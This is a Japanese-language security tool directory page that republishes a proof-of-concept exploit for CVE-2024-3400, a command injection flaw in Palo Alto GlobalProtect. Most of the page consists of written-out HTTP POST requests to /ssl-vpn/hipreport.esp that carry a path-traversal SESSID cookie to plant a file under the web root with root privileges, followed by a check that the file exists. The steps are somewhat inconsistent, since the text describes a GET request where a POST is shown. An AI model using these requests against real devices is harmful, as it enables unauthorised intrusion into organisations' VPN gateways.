Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3400-Palo-Alto-OS-Command-Injection — CVE-2024-3400の概念実証エクスプロイト。Palo Alto GlobalProtectのコマンドインジェクション脆弱性で、巧妙に細工されたHTTPリクエストによるファイルアップロードと検証を実証します。 | Kitploit
ツール/GitHubGitHub/0xr2r/cve-2024-3400-palo-alto-os-command-injection
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHub0xr2r/cve-2024-3400-palo-alto-os-command-injection

CVE-2024-3400-Palo-Alto-OS-Command-Injection

CVE-2024-3400の概念実証エクスプロイト。Palo Alto GlobalProtectのコマンドインジェクション脆弱性で、巧妙に細工されたHTTPリクエストによるファイルアップロードと検証を実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
622年前未レビュー

#手順 :


#1. デバイス上にファイル (0xr2r.txt) が存在するかどうかを、以下のGETリクエストを実行して確認するか、ブラウザで以下のURLを開いて確認します。

https://domain.com/global-protect/portal/images/0xr2r.txt ブラウザでURLを開いてください。 404レスポンスが返ってきた場合、ファイルは存在しません。


root@kitploit:~


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

#2. 次に、以下のPOSTリクエストを実行して、デバイス上にファイル (0xr2r.txt) を配置します。これにより、指定されたパスにルートアクセス権限でファイルが作成されます。


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r


#3. 再度ファイルにアクセスしようとすると、404の代わりに403が返されるはずです。これにより、ファイル (0xr2r.txt) がルートアクセス権限でデバイス上に存在することが証明されます。


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
ツールをダウンロード